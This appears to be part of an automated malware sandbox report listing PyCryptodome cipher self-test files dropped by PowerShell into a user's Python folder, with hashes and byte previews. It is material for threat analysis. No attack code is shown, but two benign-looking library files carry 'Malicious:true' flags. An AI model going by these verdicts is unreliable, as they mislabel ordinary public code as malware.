                                                                                                                                                                                                                              Preview:........Z.Vfjc..............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z.i.f.d...Z.e.d.k(..r.d...Z...e.j$..................d.............y.y.).z&Self-test suite for Crypto.Cipher.ARC4.....N)...b)...list_test_cases)...unhexlify)...ARC4).)...0123456789abcdef..75b7878099e0c596r....z.Test vector 0)...0000000000000000..7494c2e7104b0879r....z.Test vector 1).r......de188941a3375d3ar....z.Test vector 2)...00000000000000000000..d6a141a7ec3c38dfbd61..ef012345z.Test vector 3)......010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6286
                                                                                                                                                                                                                              Entropy (8bit):5.325956832315883
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:scJAjvi+MTUcStqrTP6hIa4TPvLrNMXhJAIK7Dact:scJqi+XhJA17Dact
                                                                                                                                                                                                                              MD5:C38077B4DF55A74636203DF6E3BEBFA5
                                                                                                                                                                                                                              SHA1:2A01B5DD553A380E38933315192F44C43D9CAADB
                                                                                                                                                                                                                              SHA-256:F5E99FD9702BBBB67A41F8B2FFEDC5055099CAA9C4B4268C2BEB9E8AA8FA99D1
                                                                                                                                                                                                                              SHA-512:34C1C4E6A6962031A99C3731D74D7F6B01B40D6B70FB8DDB7E30C7730D2DE37424081282ADBDBD36022FBCECF11D67040171825AEB2344DE23FAF1BCD3543277
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf................................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z.i.f.d...Z.e.d.k(..r.d.d.l.Z.d...Z...e.j...................d.............y.y.).z*Self-test suite for Crypto.Cipher.Blowfish.....N)...bchr)...Blowfish)7....0000000000000000..4ef997456198dd78r....)...ffffffffffffffff..51866fd5b85ecb8ar....)...1000000000000001..7d856f9a613063f2..3000000000000000)...1111111111111111..2466dd878b963c9dr....).r......61f9c3802281b096..0123456789abcdef).r......7d0cc630afda1ec7r....r....).r......0aceab0fc6a0a28d..fedcba9876543210)...01a1d6d039776742..59c68245eb05282b..7ca110454a1a6e57)...5cd54ca83def57da..b1b8cc0b250f09a0..0131d9619dc1376e)...0248d43806f67172..1730e5778bea1da4..07a1133e4a0b2686)...51454b582ddf440a..a25e7856cf2651eb..3849674c2602319e)...42fd443059577fa2..353882b109ce8f1a..04b915ba43feb5b6)...059b5e0851cf143a..48f4d0884c379918..0113b970fd34f2ce)...0756d8e0774761d2..432193b78951fc
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3693
                                                                                                                                                                                                                              Entropy (8bit):4.8950407603091195
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:fRIWA+CtrBJAJYskBzubjnFybzWaxbpaENBwHJiSufJnFr/Ot0aYwo77Q57K6TOH:a88AkBzOjnFyvhxbAENB9dFj4YwtHiH
                                                                                                                                                                                                                              MD5:4312DA871A5EA160BC57B6661E3759A2
                                                                                                                                                                                                                              SHA1:81F7E694DA7DDF0D6F569A83B963780AB7EDDF86
                                                                                                                                                                                                                              SHA-256:65635134D4F1187A71BA1FCA9E456030CBD259ECB262031D584CA56EE8C94D18
                                                                                                                                                                                                                              SHA-512:86EF1EF96382A26B1168A262B25E2D4045D6361CA4A998F77B6EB3CE815E86953A1E7EEDC19D7136581802C5D19F62FF9540BD402965D1D94C178BFE5CD758C0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf4...............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z.i.f.d...Z.e.d.k(..r.d...Z...e.j...................d.............y.y.).z&Self-test suite for Crypto.Cipher.CAST.....N)...bchr)...CAST).)...0123456789abcdef..238b4fe5847e44b2. 0123456712345678234567893456789az.128-bit key).r......eb6a711a2c02271b..01234567123456782345z.80-bit key).r......7ac816d16e9b302e..0123456712z.40-bit keyc...........................e.Z.d.Z.d...Z.y.)...KeyLengthc...........................|.j...................t.........t.........j...................t.........d.........d.z...t.........j.............................|.j...................t.........t.........j...................t.........d.........d.z...t.........j.............................y.).Nr..............)...assertRaises..ValueErrorr......newr......MODE_ECB)...selfs.... .QC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/SelfTest/Cipher/te
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):29065
                                                                                                                                                                                                                              Entropy (8bit):4.7195069642449985
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:q/OOKvqGsdbsWPOlb8BodC+Nir/jy1Wwl+ldjUVMdidU:qevq3dbspC+Nivy1Zl+ldjqMdidU
                                                                                                                                                                                                                              MD5:0E57DB94F00A41300313A7668E685CA8
                                                                                                                                                                                                                              SHA1:5FA64E1316FD8DD0F210D8744FEE191603D03581
                                                                                                                                                                                                                              SHA-256:CA72F635DD1C7E18902B29B07779A1E1990D8066084A13372AFD339A64FEABCF
                                                                                                                                                                                                                              SHA-512:3B16A6C7BE7B281AC9C427A68D48B278942E1A6187440BF4CCCD4DACA57A0FDD1146A56E01BF44DDFC4692CD3729C397FFE34CAE644750C228BCC9280228C175
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf.Q..............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d...Z...G.d...d.e.j"..........................Z...G.d...d.e.........Z...G.d...d.e.j"..........................Z...G.d...d.e.........Z.d.Z.d.Z.e.D.]...Z.e.f.d...Z...e.e.d.e.z...e...............e.D.]...Z.e.f.d...Z...e.e.d.e.z...e...............[.[.d.Z.e.D.]...Z.e.f.d...Z...e.e.d.e.z...e.................G.d...d.e.j"..........................Z.i.f.d...Z.e.d.k(..r.d...Z...e.j@..................d.............y.y.) .....N)...unhexlify)...load_test_vectors)...list_test_cases)...tobytes..is_string)...AES..DES3..DES)...SHAKE128c.....................^.....t.........j...................t.........|...................j...................|.........S.).N)...data).r......newr......read)...tag..lengths.... .PC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/SelfTest/Cipher/test_CBC.py..get_tag_randomr....)...s .........<.<.W.S.\..*../../....7..7.....c...............
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):50482
                                                                                                                                                                                                                              Entropy (8bit):4.7154451693508905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:iwFIj+Fv1G6nycm333YjLl2IEPZ4a+PfQkB0aaeNLYrSEr96+tHmaX:tfKYl2OQkBir50+tnX
                                                                                                                                                                                                                              MD5:163045B6034776118B6CE6F1E9B17058
                                                                                                                                                                                                                              SHA1:F427F24BF1ED7C7769EAB0AE9539950ABBB6DCA6
                                                                                                                                                                                                                              SHA-256:1ACF8B445502E95F95ED6153A45748ADA27522A1A5EDC68A51DA6D74039BD1B0
                                                                                                                                                                                                                              SHA-512:9D89EA1AEEE998F6CDB75F6628964A076642393EAC03434ADB8D10222B548D8C1808055E7638B8BCC092D2DE3D7D606018D9C558377A4F980A9F967B9C34F3B0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf`.........................T.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z...G.d...d.e.j"..........................Z...G.d...d.e.j"..........................Z...G.d...d.e.j"..........................Z...G.d...d.e.j"..........................Z.i.f.d...Z.e.d.k(..r.d...Z...e.j2..................d.............y.y.)......N)...unhexlify)...list_test_cases)...load_test_vectors_wycheproof)...tobytes..bchr)...AES)...SHAKE128)...strxorc.....................^.....t.........j...................t.........|...................j...................|.........S.).N)...data).r......newr......read)...tag..lengths.... .PC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/SelfTest/Cipher/test_CCM.py..get_tag_randomr....+...s .........<.<.W.S.\..*../../....7..7.....c...........................e.Z.d.Z...e.d.d.........Z...e.d.d.........Z...e.d.d.........Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18331
                                                                                                                                                                                                                              Entropy (8bit):5.038531207720613
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:GfR+SJ2SeoCINCtICStOyg3aJLGRz0eD4J3owu2dVVALyqZE6Y6frYF5JZS7OZfo:K4olpsyg3Dz92lBjMZE6XjYFDZS7Cw
                                                                                                                                                                                                                              MD5:A145E3EF63D9C3FB24148565DC2CDF88
                                                                                                                                                                                                                              SHA1:EB2D9A90632F102D6047E8261AB3754BB2D6C7B7
                                                                                                                                                                                                                              SHA-256:C0927E163662459E96341CD7F60828D1790CDA9BD39A01A8140314F1749F98A6
                                                                                                                                                                                                                              SHA-512:662E31E9698AE2E685507A0A28E05E3A229362A6618DC49A566C932E7E29E980C1987BBCB2AF348806E1D004699F3512D44EAF8EC1DB8BDB98D4830B36AC792D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.VfX@........................`.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z...G.d...d.e.........Z...G.d...d.e.j(..........................Z.d.Z.d.Z.e.D.]...Z.d.D.]'..Z.e.j5..................d.e.........Z.e.e.f.d...Z...e.e.d.e.z...e............)...0..e.D.]...Z.d.D.]'..Z.e.j5..................d.e.........Z.e.e.f.d...Z...e.e.d.e.z...e............)...0..[.[.d.Z.e.D.]...Z.d.D.]...Z.e.j5..................d.e.........Z.e.e.f.d...Z.......e.e.d.e.z...e............0....G.d...d.e.j(..........................Z.i.f.d...Z e!d.k(..r.d...Z"..e.jF..................d.............y.y.) .....N)...unhexlify)...load_test_vectors)...list_test_cases)...tobytes..is_string)...AES..DES3..DES)...SHAKE128)...BlockChainingTestsc.....................^.....t.........j...................t.........|...................j...................|.........S.).N)...data).r......newr......read)...tag..lengths.... .PC:\Users\xbov\Desktop\pyops\Lib\site-
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):29527
                                                                                                                                                                                                                              Entropy (8bit):4.590434641009218
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:g9+XlifjqpNo4+I+IHALBMCE0lM6y5KGlqIVFjSorv:ojqHVuyN5Lrv
                                                                                                                                                                                                                              MD5:A18051D21ADF5ADF779EBE1A8FFC9074
                                                                                                                                                                                                                              SHA1:D9DACA3DDB04CF7C4B5C0659A701C947175EE796
                                                                                                                                                                                                                              SHA-256:9A6100D9E77ABDFC271C9C4C6B0EB2DBACF9D89E223258C0E755033D2F58C602
                                                                                                                                                                                                                              SHA-512:35E8749FF24A98C9220CE65FE1AA2134CA5CA7467CD7DD55B470D2350E0B648A75B26F46DC8645C89924164E20211AC62736EEDFA89C5AFFD0BA3522A646AB2F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf.U........................*.....d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d...Z...G.d...d.e.j$..........................Z...G.d...d.e.j$..........................Z...G.d...d.e.j$..........................Z.i.f.d...Z.e.d.k(..r.d...Z...e.j2..................d.............y.y.)......N)...hexlify..unhexlify)...list_test_cases)...tobytes..bchr)...AES..DES3)...SHAKE128..SHA256)...Counterc.....................^.....t.........j...................t.........|...................j...................|.........S.).N)...data).r......newr......read)...tag..lengths.... .PC:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/SelfTest/Cipher/test_CTR.py..get_tag_randomr....(...s .........<.<.W.S.\..*../../....7..7.....c.....................".....e.Z.d.Z...e.d.d.........Z...e.d.d.........Z...e.d.d.........Z...e.d.d.........Z...e.j...................d.e...........Z...e.j...................d.e...........Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):23911
                                                                                                                                                                                                                              Entropy (8bit):5.210242016181041
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:m4xntRZ7jjiaiUIjsj7EBT5AaUOg4OLrjkvrbUS1hG+EpavXa:mutRZ7jji5UI4j7EBtAaLg4W2rB1hG+C
                                                                                                                                                                                                                              MD5:CE845165C1FDA857FF843ABA878FD8C5
                                                                                                                                                                                                                              SHA1:A134E8D83D2C756E9FD039E9DA668FC8E8EF5495
                                                                                                                                                                                                                              SHA-256:AAEC92B4463648B4AFED71474F6FAB492AAEB76367BA1493296C5D881CD5A045
                                                                                                                                                                                                                              SHA-512:350FC516752E7EA84CE94E6466E94FAA4CD8A638EEA88A2AD3326D21B52D4C00D4509C64DB0BCA9D3AAC8B0DD74C017FE2EF2D60E7AD48580B16590CCE021736
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.VfmQ.............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.j ..........................Z...G.d...d.e.j ..........................Z...G.d...d.e.j ..........................Z...G.d...d.e.j ..........................Z...G.d...d.e.j ..........................Z...G.d...d.e.j ..........................Z.i.f.d...Z.e.d.k(..r.d.d.l.Z.d...Z...e.j4..................d.............y.y.)......N)...hexlify..unhexlify)...b..tobytes..bchr)...strxor_c)...list_test_cases)...ChaCha20c.....................H.....e.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...ChaCha20Testc...........................t.........j...................t.........d.........d.z...d...........}.|.j...................|.j...................d...........t.........j...................t.........d.........d.z...d...........}.|.j...................|.j...................d...........y.).N..0. ...s....00000000....key..nonces....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):40615
                                                                                                                                                                                                                              Entropy (8bit):4.8595367860155125
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:eS7rfBhbRBIU+h78ttgg9a2HBuST5wgUWGr5BzvTpT1pb+4lLAMFbWXJLc8ed:hDPyg9auuc0rPrdYI
                                                                                                                                                                                                                              MD5:2B5B48C301858B9EE24A45B569BE3E73
                                                                                                                                                                                                                              SHA1:644650F41E49CBC1A31273EDEF7E5B1CF3BB1464
                                                                                                                                                                                                                              SHA-256:951FAA99A294EF748E614BFFFBC225C3E4E8CE5698AB09B5EA333AC4C5910C9E
                                                                                                                                                                                                                              SHA-512:0E82B1DD8F4BDDA64BB7A0E3C06D66CBE2A2D325FD57DFDB2E0495754D48B6459A669C30A8A156B38CA8789F3B34E67E78BBB288E1E916F0A588BFA670E0A11D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf.{.............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z...G.d...d.e.j ..........................Z...G.d...d.e.j ..........................Z...G.d...d.e.j ..........................Z.d...Z...G.d...d.e.j ..........................Z...G.d...d.e.j ..........................Z...G.d...d.e.j ..........................Z.i.f.d...Z.e.d.k(..r.d...Z...e.j6..................d.............y.y.)......N)...unhexlify)...list_test_cases....load_test_vectors_wycheproof)...tobytes)...ChaCha20_Poly1305)...SHAKE128)...strxorc.....................^.....t.........j...................t.........|...................j...................|.........S.).N)...data).r......newr......read)...tag..lengths.... .^C:\Users\xbov\Desktop\pyops\Lib\site-packages\Crypto/SelfTest/Cipher/test_ChaCha20_Poly1305.py..get_tag_randomr....+...s .........<.<.W.S.\..*../../....7..7.....c..........................e.Z.d.Z...e.d.d.........Z...e.d.d......
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):16444
                                                                                                                                                                                                                              Entropy (8bit):5.928225228685259
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:BoXH3H6qCcF/fHXHjDeNGG4AsPcKVdvjlujWXhJAQFcX0wGsh9y2PWhGeGOm+T8b:BoXJV3EGG4lNnXhJAccX0wGsh97Wxal
                                                                                                                                                                                                                              MD5:7F78C44EE3BDD25C1C42FB8DA8879055
                                                                                                                                                                                                                              SHA1:97531E8138ACD6D88407337BE2C9D38A2933D98D
                                                                                                                                                                                                                              SHA-256:B21A69C65D9B9C0859DB4198BEB4E17F54FC72F57E8909141535A89D8BED51CE
                                                                                                                                                                                                                              SHA-512:1365598C31BC653666D8B6144EDA38280AF6688662F21D1ED1545B43753E7F2E9667C11EAAB5FD54B377D65B53988B5BC01E1A94FBBC47DE78ED172238083CA6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf.?........................Z.....d.Z.d.d.l.Z.d.d.l.m.Z...d.Z.d.Z.g.d...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d e.d!f...d"d#e.d$f...d%d&e.d'f...d(d)e.d*f...d+d,e.d-f...d.d/e.d0f...d1d2e.d3f...d4d5e.d6f...d7d8e.d9f...d:d;e.d<f...d=d>e.d?f...d@dAe.dBf...dCdDe.dEf...dFdGe.dHf...dIdJe.dKf...dLdMe.dNf...dOdPe.dQf...dRdSe.dTf...dUdVe.dWf...dXdYe.dZf...d[d\e.d]f...d^d_e.d`f...dadbe.dcf...dddee.dff...dgdhe.dif...djdke.dlf...dmdne.dof...dpdqe.drf...dsdte.duf...dvdwe.dxf...dydze.d{f...d|d}e.d~f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...d.d.e.d.f...e.d.d.d.f...e.d.d.d.f...e.d.d.d.f...e.d.d.d.f...e.d.d.d.f...e.d.d.d.f...e.d.d.d.f...e.d.d.d.f...e.d.d.d.f...e.d.d.d.f...e.d.d.d.f...e.d.d.d.f...e.d.d.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7290
                                                                                                                                                                                                                              Entropy (8bit):5.115890062821634
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:GEUrBRl6gXK8euuHGyFMlyFNq7hxbAENBMXpqiuiwqRU6fNPW2J:JysYKxxuhJApTm9gPhJ
                                                                                                                                                                                                                              MD5:73EB458F6F47DB5EB1828AD33355E712
                                                                                                                                                                                                                              SHA1:E4849CF39C508BF3CFC3DDBC7CB5997C71DECD19
                                                                                                                                                                                                                              SHA-256:961FC8FD0246C531F0E5672F6AF1B559E1AF213CF69552ABE345C8EC9FCE1524
                                                                                                                                                                                                                              SHA-512:E5C05322CE810E17A3CF6C87D0A9A36CF2EC800FFDEFD8D7C5F955BDD3B8F6EF5EBD38BB786A62AB0B5269AEF5161DAD715A5DEF5800A07F401235FF642A805A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vfd..............................d.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.d.Z.e.D.]...Z...e.d.e.d.e.z...d.d...i.........x.s...g.Z...e.e.........D.]...\...Z.Z...e.e.e.........r...e.j2..................e.j4..................z...e.j6..................z...Z...e...e.e.j:....................................e...e.e.j<....................................e...e.e.................e...d.e...d...f.Z.e.jA..................e.....................G.d...d.e.jB..........................Z"..G.d...d.e.jB..........................Z#..G.d...d.e.jB..........................Z$i.f.d...Z%e&d.k(..r.d.d.l.Z.d...Z'..e.jP..................d.............y.y.).z&Self-test suite for Crypto.Cipher.DES3.....N)...hexlify..unhexlify)...DES3)...strxor_c)...bchr..tostr)...load_test_vectors)...list_test_cases)..054686520717566636b2062726f776e20666f78206a756d70.0a826fd8ce53b855fcce21c8112256fe668d5c05dd9b6b900.00123456789abcdef23456789abcdef01456789abcdef012
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):43739
                                                                                                                                                                                                                              Entropy (8bit):4.606704897987088
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:xN8iBQH6Cimwo+YN4sd9A6xm8K7xmqoEo9qJwOXJd4BEf5AnCy6:gkYNn9AWq17X8kXy6
                                                                                                                                                                                                                              MD5:CEBEDB552772343E53F6409DDE8C85A4
                                                                                                                                                                                                                              SHA1:41AE565EA2D2F7697C352214D2F34637EEAFCBCF
                                                                                                                                                                                                                              SHA-256:EFDB6DB9E28002A5458A8436F6175FA7C4EA14EB7733C4E6A60A0D3C5B863188
                                                                                                                                                                                                                              SHA-512:21D1B3FFE767FF9E7EF57693644AD5A3F278CF120A5D6E4B2E644D4C6324FBBFAD6623F9CB807CCBB49B303A1537E9099610E2F6D3031D73B7D71008FCA33E88
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........Z.Vf.s........................f.....d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z...G.d...d.e.j$..........................Z...G.d...d.e.j$..........................Z...G.d...d.e.j$..........................Z...G.d...d.e.j$..........................Z...G.d...d.e.j$..........................Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...e.j9..................d...e.e.j<..........................z...e.e.j<............................e.j<..................D.]...Z.e.j9..................d...e.e.........z...e.e............ ..e.j<..................D.]...Z.e.j9..................d...e.e.........z...e.e............ ..e.j<..................D.]...Z.e.j9..................d...e.e.........z...e.e............ ..e.j<..................D.]...Z.e.j9..................d...e.e.........z...e.e............ ..i.f.d...Z e!d.k(..r.d...Z"..e.jF..................d.............y.y.)......N)...unhexlify)...list_test_cases)...load_test_vectors_wycheproof)...tobytes..bch
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3311
                                                                                                                                                                                                                              Entropy (8bit):5.046154186405365
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:newfFQHvov0c11HR8GqgxpSKgdkyKv2JeIPHkOS:newdQHv+V00+dkyKv24IcOS
                                                                                                                                                                                                                              MD5:6006235799D8B51FA0D57D451012FBF9
                                                                                                                                                                                                                              SHA1:5FF6022873D06D926211402F22235339F228ED24
                                                                                                                                                                                                                              SHA-256:A5195DE8F0FD1855C9FE4170915BC36C9C9F85DF5B8E14FEAF817C570F9C25F1
                                                                                                                                                                                                                              SHA-512:66EB48B147A76F1531746E13E699610C26CB8094833005223ACF0B7A74E548388AE94349A642EF2A40132076A1D8C8A74EE85997AD3BE8290B758A76A9E3FE06
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..#..# SelfTest/__init__.py: Self-test for PyCrypto..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWAR
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1612
                                                                                                                                                                                                                              Entropy (8bit):5.252093420200057
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:SKKXDrFR/F2IPBiCXCpjf29QHupsUre38Ok41+dpo3oq/FGROi5hC3b7f5VNLjg/:SeIB0jcQHMsvI/S3oCFGROi+7nfc
                                                                                                                                                                                                                              MD5:80548AD81CAB82847277B36A7FB78711
                                                                                                                                                                                                                              SHA1:DF518CE7B812750B118835598A3E6278934D7F42
                                                                                                                                                                                                                              SHA-256:165A0BA1E31BEC7C6E80633F113D3882CC2AC98E37F51E9224AAAE8B3DF93D67
                                                                                                                                                                                                                              SHA-512:0357B12B490096A0564944310129D5EEBFAADDF5CDB3EB8465D36422AAB4AB606937FD1BB927C49904D7A43E12B9139D486D438D36B59FE06BF1145744AAA09A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:#! /usr/bin/env python..#..# __main__.py : Stand-along loader for PyCryptodome test suite..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3053
                                                                                                                                                                                                                              Entropy (8bit):5.322538714303342
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:phF0H3VsWEBwVeps/KgGXUIVAex/2BUwfLrIQHZ/yFw/81hT0QvIgO:50XV0BwMps/KgdI2ex+hLH9/mTpbO
                                                                                                                                                                                                                              MD5:23100112E89CA9396BEABFA4BE189E39
